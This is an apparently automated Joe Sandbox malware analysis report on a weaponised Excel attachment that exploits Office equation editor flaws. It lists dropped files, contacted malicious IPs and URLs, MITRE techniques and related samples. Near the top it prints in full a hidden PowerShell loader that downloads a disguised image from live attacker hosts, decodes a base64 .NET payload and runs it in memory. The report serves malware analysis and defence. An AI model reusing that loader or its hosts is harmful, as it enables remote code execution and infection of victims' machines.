treagbwdgtregcdgtrejwdgtrepdgJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/738/994/original/new_image_vbs_updated.jpg?1707769907', 'http://45.74.19.84/xampp/bkp/vbs_novo_new_image.jpg'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.hgus/6653/69.442.29.19//:ptth' , '1' , 'c:\programdata\' , 'suu','regasm',''))} }Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information221
Scripting		Valid Accounts111
Command and Scripting Interpreter		221
Scripting		111
Process Injection		1
Masquerading		OS Credential Dumping1
Process Discovery		Remote ServicesData from Local System1
Web Service		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts43
Exploitation for Client Execution		1
DLL Side-Loading		1
DLL Side-Loading		1
Disable or Modify Tools		LSASS Memory21
Virtualization/Sandbox Evasion		Remote Desktop ProtocolData from Removable Media1
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts3
PowerShell		Logon Script (Windows)Logon Script (Windows)1
Modify Registry		Security Account Manager1
Application Window Discovery		SMB/Windows Admin SharesData from Network Shared Drive23
Ingress Tool Transfer		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook21
Virtualization/Sandbox Evasion		NTDS1
Remote System Discovery		Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
Process Injection		LSA Secrets1
File and Directory Discovery		SSHKeylogging13
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Obfuscated Files or Information		Cached Domain Credentials13
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Install Root Certificate		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
DLL Side-Loading		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1391949 Sample: SHREE GANESH BOOK SERVICES-... Startdate: 14/02/2024 Architecture: WINDOWS Score: 100 54 Multi AV Scanner detection for domain / URL 2->54 56 Malicious sample detected (through community Yara rule) 2->56 58 Antivirus detection for URL or domain 2->58 60 18 other signatures 2->60 8 EXCEL.EXE 58 57 2->8         started        process3 dnsIp4 46 91.92.244.96, 49162, 49163, 49164 THEZONEBG Bulgaria 8->46 44 mcirosfotupdatedne...ntirepcupday[1].doc, ISO-8859 8->44 dropped 12 wscript.exe 1 8->12         started        16 WINWORD.EXE 345 37 8->16         started        19 AcroRd32.exe 27 8->19         started        file5 process6 dnsIp7 48 paste.ee 12->48 50 paste.ee 104.21.84.67, 443, 49169, 49170 CLOUDFLARENETUS United States 12->50 68 System process connects to network (likely due to code injection or exploit) 12->68 70 Suspicious powershell command line found 12->70 72 Wscript starts Powershell (via cmd or directly) 12->72 82 5 other signatures 12->82 21 powershell.exe 4 12->21         started        32 mcirosfotupdatedne...tirepcupday.doC.url, MS 16->32 dropped 34 C:\Users\user\...\agh on 91.92.244.96.url, MS 16->34 dropped 36 ~WRF{67551F0E-90CB...1-F0E70E1E7186}.tmp, Composite 16->36 dropped 38 C:\Users\user\AppData\Local\...\310E1AAE.doc, ISO-8859 16->38 dropped 74 Microsoft Office launches external ms-search protocol handler (WebDAV) 16->74 76 Office viewer loads remote template 16->76 78 Microsoft Office drops suspicious files 16->78 24 EQNEDT32.EXE 12 16->24         started        27 RdrCEF.exe 2 19->27         started        file8 80 Connects to a pastebin service (likely for C&C) 48->80 signatures9 process10 file11 62 Suspicious powershell command line found 21->62 29 powershell.exe 12 5 21->29         started        40 C:\Users\user\AppData\...\loverhappy.vbs, Unicode 24->40 dropped 42 C:\Users\user\AppData\...\loverhappy[1].vbs, Unicode 24->42 dropped 64 Office equation editor establishes network connection 24->64 66 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 24->66 signatures12 process13 dnsIp14 52 uploaddeimagens.com.br 104.21.45.138, 443, 49171 CLOUDFLARENETUS United States 29->52

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
SHREE GANESH BOOK SERVICES-347274.xls24%VirustotalBrowse
SHREE GANESH BOOK SERVICES-347274.xls18%ReversingLabsDocument-Office.Exploit.CVE-2017-0199

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\310E1AAE.doc100%AviraHEUR/Rtf.Malformed
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\mcirosfotupdatednewbabyprojectrelatedballonupdationtoimprovethenewupdationfasterthanbeforetoentirepcupday[1].doc100%AviraHEUR/Rtf.Malformed
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{67551F0E-90CB-489F-80A1-F0E70E1E7186}.tmp100%AviraEXP/CVE-2017-11882.Gen

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
uploaddeimagens.com.br4%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://ocsp.entrust.net030%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
http://ocsp.entrust.net0D0%URL Reputationsafe
https://uploaddeimagens.com.br/images/004/738/994/original/new_image_vbs_updated.jpg?17077699070%Avira URL Cloudsafe
http://91.92.244.96/agh/mcirosfotupdatednewbabyprojectrelatedballonupdationtoimprovethenewupdationfasterthanbeforetoentirepcupday.doC100%Avira URL Cloudmalware
https://www.google.com;0%Avira URL Cloudsafe
http://45.74.19.84/xampp/bkp/vbs_novo_new_image.jpg100%Avira URL Cloudmalware
http://91.92.244.96/3566/loverhappy.vbs1%VirustotalBrowse
http://91.92.244.96/agh/mcirosfotupdated100%Avira URL Cloudmalware
http://91.92.244.96/agh/100%Avira URL Cloudmalware
http://91.92.244.96/3566/loverhappy.vbs100%Avira URL Cloudmalware
http://91.92.244.96/agh/mcirosfotupdatednewbabyprojectrelatedballonupdationtoimprovethenewupdationfasterthanbeforetoentirepcupday.doC2%VirustotalBrowse
http://91.92.244.96/3566/loverhappy.vbsooC:100%Avira URL Cloudmalware
https://uploaddeimagens.com.br/images/004/738/994/original/new_image_vbs_updated.jpg?17077699074%VirustotalBrowse
http://tempuri.org/BD_AUTOMCAODataSet1.xsd0%Avira URL Cloudsafe
http://91.92.244.96/agh/mcirosfotupdatednewbabyprojectrelatedballonupdationtoimprovethenewupdationfa100%Avira URL Cloudmalware
https://uploaddeimagens.com.br0%Avira URL Cloudsafe
http://91.92.244.96/agh/2%VirustotalBrowse
http://tempuri.org/BD_AUTOMCAODataSet1.xsd0%VirustotalBrowse
https://uploaddeimagens.com.br3%VirustotalBrowse
http://91.92.244.96/agh/mcirosfotupdated2%VirustotalBrowse
https://analytics.paste.ee;0%Avira URL Cloudsafe
http://45.74.19.84/xampp/bkp/vbs_novo_new_image.jpg14%VirustotalBrowse
https://cdnjs.cloudflare.com;0%Avira URL Cloudsafe
http://91.92.244.96/3566/loverhappy.vbsj100%Avira URL Cloudmalware
http://91.92.244.96/3566/loverhappy.vbsj1%VirustotalBrowse

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
paste.ee
104.21.84.67
truefalse
    		high
    uploaddeimagens.com.br
    		104.21.45.138
    		truetrueunknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://91.92.244.96/3566/loverhappy.vbstrue
    • 1%, Virustotal, Browse
    • Avira URL Cloud: malware
    		unknown
    http://paste.ee/d/eA3FMfalse
      		high
      https://paste.ee/d/eA3FMfalse
        		high
        https://uploaddeimagens.com.br/images/004/738/994/original/new_image_vbs_updated.jpg?1707769907true
        • 4%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        http://91.92.244.96/agh/mcirosfotupdatednewbabyprojectrelatedballonupdationtoimprovethenewupdationfasterthanbeforetoentirepcupday.doCtrue
        • 2%, Virustotal, Browse
        • Avira URL Cloud: malware
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://nuget.org/NuGet.exepowershell.exe, 0000000F.00000002.432397953.0000000003599000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          http://crl.entrust.net/server1.crl0wscript.exe, 0000000A.00000003.414869400.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414617670.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.415052519.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.433742680.0000000004E26000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            http://ocsp.entrust.net03wscript.exe, 0000000A.00000003.414869400.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414617670.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.415052519.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.433742680.0000000004E26000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://contoso.com/Licensepowershell.exe, 0000000F.00000002.432397953.0000000003599000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://www.google.com;wscript.exe, 0000000A.00000002.415052519.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.415052519.000000000042E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414617670.000000000042E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414660878.000000000042E000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		low
            https://contoso.com/Iconpowershell.exe, 0000000F.00000002.432397953.0000000003599000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0wscript.exe, 0000000A.00000003.414869400.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414617670.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.415052519.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.433742680.0000000004E26000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://analytics.paste.eewscript.exe, 0000000A.00000002.415052519.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.415052519.000000000042E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414617670.000000000042E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414660878.000000000042E000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              http://www.diginotar.nl/cps/pkioverheid0wscript.exe, 0000000A.00000003.414869400.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414617670.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.415052519.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.433742680.0000000004E26000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://45.74.19.84/xampp/bkp/vbs_novo_new_image.jpgpowershell.exe, 0000000F.00000002.433735210.0000000004D60000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.432397953.00000000026AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.432147188.000000000058A000.00000004.00000020.00020000.00000000.sdmptrue
              • 14%, Virustotal, Browse
              • Avira URL Cloud: malware
              		unknown
              http://91.92.244.96/agh/mcirosfotupdatedSHREE GANESH BOOK SERVICES-347274.xlsfalse
              • 2%, Virustotal, Browse
              • Avira URL Cloud: malware
              		unknown
              http://91.92.244.96/agh/agh on 91.92.244.96.url.4.drfalse
              • 2%, Virustotal, Browse
              • Avira URL Cloud: malware
              		unknown
              http://91.92.244.96/3566/loverhappy.vbsooC:EQNEDT32.EXE, 00000009.00000002.408908665.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              https://www.google.comwscript.exe, 0000000A.00000002.415052519.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.415052519.000000000042E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414617670.000000000042E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414660878.000000000042E000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                http://crl.pkioverheid.nl/DomOvLatestCRL.crl0wscript.exe, 0000000A.00000003.414869400.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414617670.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.415052519.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.433742680.0000000004E26000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://tempuri.org/BD_AUTOMCAODataSet1.xsdpowershell.exe, 0000000F.00000002.470018186.000000000D9CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.434194495.0000000006360000.00000004.08000000.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://91.92.244.96/agh/mcirosfotupdatednewbabyprojectrelatedballonupdationtoimprovethenewupdationfa~DF7A800E1E03CB42AF.TMP.0.dr, mcirosfotupdatednewbabyprojectrelatedballonupdationtoimprovethenewupdationfasterthanbeforetoentirepcupday.doC.url.4.dr, 6D330000.0.drfalse
                • Avira URL Cloud: malware
                		unknown
                https://uploaddeimagens.com.brpowershell.exe, 0000000F.00000002.432397953.00000000026AA000.00000004.00000800.00020000.00000000.sdmptrue
                • 3%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://contoso.com/powershell.exe, 0000000F.00000002.432397953.0000000003599000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://nuget.org/nuget.exepowershell.exe, 0000000F.00000002.432397953.0000000003599000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://analytics.paste.ee;wscript.exe, 0000000A.00000002.415052519.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.415052519.000000000042E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414617670.000000000042E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414660878.000000000042E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		low
                  https://cdnjs.cloudflare.comwscript.exe, 0000000A.00000002.415052519.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.415052519.000000000042E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414617670.000000000042E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414660878.000000000042E000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://cdnjs.cloudflare.com;wscript.exe, 0000000A.00000002.415052519.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.415052519.000000000042E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414617670.000000000042E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414660878.000000000042E000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		low
                    http://ocsp.entrust.net0Dwscript.exe, 0000000A.00000003.414869400.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414617670.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.415052519.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.433742680.0000000004E26000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000C.00000002.504808808.000000000258F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.432397953.0000000002571000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://secure.comodo.com/CPS0wscript.exe, 0000000A.00000003.414869400.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414617670.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.415052519.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.433742680.0000000004E26000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://secure.gravatar.comwscript.exe, 0000000A.00000002.415052519.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.415052519.000000000042E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414617670.000000000042E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414660878.000000000042E000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://themes.googleusercontent.comwscript.exe, 0000000A.00000002.415052519.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.415052519.000000000042E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414617670.000000000042E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414660878.000000000042E000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://crl.entrust.net/2048ca.crl0wscript.exe, 0000000A.00000003.414869400.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.414617670.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.415052519.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.433742680.0000000004E26000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://91.92.244.96/3566/loverhappy.vbsjEQNEDT32.EXE, 00000009.00000002.409074474.00000000036B0000.00000004.00000020.00020000.00000000.sdmpfalse
                              • 1%, Virustotal, Browse
                              • Avira URL Cloud: malware
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              104.21.45.138
                              		uploaddeimagens.com.brUnited States
                              		13335CLOUDFLARENETUStrue
                              91.92.244.96
                              		unknownBulgaria
                              		34368THEZONEBGtrue
                              104.21.84.67
                              		paste.eeUnited States
                              		13335CLOUDFLARENETUSfalse

                              General Information

                              Joe Sandbox version:40.0.0 Tourmaline
                              Analysis ID:1391949
                              Start date and time:2024-02-14 08:28:33 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 5m 44s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:defaultwindowsofficecookbook.jbs
                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                              Number of analysed new started processes analysed:19
                              Number of new started drivers analysed:1
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • GSI enabled (VBA)
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:SHREE GANESH BOOK SERVICES-347274.xls
                              Detection:MAL
                              Classification:mal100.spre.troj.expl.evad.winXLS@18/49@3/3
                              EGA Information:
                              • Successful, ratio: 33.3%
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 18
                              • Number of non-executed functions: 7
                              Cookbook Comments:
                              • Found application associated with file extension: .xls
                              • Found Word or Excel or PowerPoint or XPS Viewer
                              • Attach to Office via COM
                              • Active ActiveX Object
                              • Active ActiveX Object
                              • Active ActiveX Object
                              • Active ActiveX Object
                              • Active ActiveX Object
                              • Scroll down
                              • Close Viewer

                              Warnings

                              • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe, conhost.exe
                              • Execution Graph export aborted for target powershell.exe, PID 3476 because it is empty
                              • Execution Graph export aborted for target powershell.exe, PID 3636 because it is empty
                              • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtCreateFile calls found.
                              • Report size getting too big, too many NtOpenFile calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                              • Report size getting too big, too many NtQueryDirectoryFile calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              08:29:50API Interceptor26x Sleep call for process: EQNEDT32.EXE modified
                              08:29:52API Interceptor18x Sleep call for process: wscript.exe modified
                              08:29:54API Interceptor212x Sleep call for process: powershell.exe modified
                              08:29:59API Interceptor191x Sleep call for process: AcroRd32.exe modified
                              08:30:17API Interceptor39x Sleep call for process: RdrCEF.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              104.21.45.138Name.vbsGet hashmaliciousUnknownBrowse
                                517209487.vbsGet hashmaliciousXWormBrowse
                                  comprobante0089.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                                    87645345.vbsGet hashmaliciousXWormBrowse
                                      387165243.vbsGet hashmaliciousXWormBrowse
                                        cotizaci#U00f3n para nuevo pedido.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                                          240202PIMXF24C.docx.docGet hashmaliciousRemcosBrowse
                                            Facturas 000005111, 005112,, 005113, 005114 0005115.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                                              oerder specifications.xlsGet hashmaliciousRemcosBrowse
                                                screenshots.vbsGet hashmaliciousXWormBrowse
                                                  91.92.244.96P018400.xla.xlsxGet hashmaliciousUnknownBrowse
                                                  • 91.92.244.96/LEO/Leoloverme.vbs
                                                  RFQ l MR24000112.xla.xlsxGet hashmaliciousUnknownBrowse
                                                  • 91.92.244.96/3566/loverhappy.vbs
                                                  104.21.84.67dereac.vbeGet hashmaliciousUnknownBrowse
                                                  • paste.ee/d/JZHbW
                                                  P018400.xla.xlsxGet hashmaliciousUnknownBrowse
                                                  • paste.ee/d/kmRFs
                                                  comprobante0089.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                                                  • paste.ee/d/cJo7v
                                                  RFQ l MR24000112.xla.xlsxGet hashmaliciousUnknownBrowse
                                                  • paste.ee/d/EgkAG
                                                  87645345.vbsGet hashmaliciousXWormBrowse
                                                  • paste.ee/d/IJGyf
                                                  182763543.vbsGet hashmaliciousXWormBrowse
                                                  • paste.ee/d/0kkOm
                                                  PaymentEUR41000.xlsGet hashmaliciousRemcosBrowse
                                                  • paste.ee/d/oVqcS
                                                  RFQ-#Uacac#Uc801#Uc758#Ub8b0#Uc11c-#Uacac#Uc801#Uc758#Ub8b0#Uc11c.vbsGet hashmaliciousRemcosBrowse
                                                  • paste.ee/d/6VwxD
                                                  240202PIMXF24C.docx.docGet hashmaliciousRemcosBrowse
                                                  • paste.ee/d/wPDYR
                                                  Purchase Order202428 (1).xlsGet hashmaliciousRemcosBrowse
                                                  • paste.ee/d/pQbyK

                                                  Domains

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  paste.eedereac.vbeGet hashmaliciousUnknownBrowse
                                                  • 104.21.84.67
                                                  Name.vbsGet hashmaliciousUnknownBrowse
                                                  • 172.67.187.200
                                                  P018400.xla.xlsxGet hashmaliciousUnknownBrowse
                                                  • 104.21.84.67
                                                  517209487.vbsGet hashmaliciousXWormBrowse
                                                  • 172.67.187.200
                                                  comprobante0089.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                                                  • 104.21.84.67
                                                  RFQ l MR24000112.xla.xlsxGet hashmaliciousUnknownBrowse
                                                  • 104.21.84.67
                                                  wsf.zipGet hashmaliciousRemcosBrowse
                                                  • 104.21.84.67
                                                  screen_shots.vbsGet hashmaliciousXWormBrowse
                                                  • 172.67.187.200
                                                  wsf.zipGet hashmaliciousRemcosBrowse
                                                  • 172.67.187.200
                                                  66432890.vbsGet hashmaliciousUnknownBrowse
                                                  • 172.67.187.200
                                                  uploaddeimagens.com.brdereac.vbeGet hashmaliciousUnknownBrowse
                                                  • 172.67.215.45
                                                  Name.vbsGet hashmaliciousUnknownBrowse
                                                  • 104.21.45.138
                                                  P018400.xla.xlsxGet hashmaliciousUnknownBrowse
                                                  • 172.67.215.45
                                                  517209487.vbsGet hashmaliciousXWormBrowse
                                                  • 104.21.45.138
                                                  comprobante0089.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                                                  • 104.21.45.138
                                                  RFQ l MR24000112.xla.xlsxGet hashmaliciousUnknownBrowse
                                                  • 172.67.215.45
                                                  wsf.zipGet hashmaliciousRemcosBrowse
                                                  • 172.67.215.45
                                                  66432890.vbsGet hashmaliciousUnknownBrowse
                                                  • 172.67.215.45
                                                  87645345.vbsGet hashmaliciousXWormBrowse
                                                  • 104.21.45.138
                                                  1e#U041e.vbsGet hashmaliciousAgentTeslaBrowse
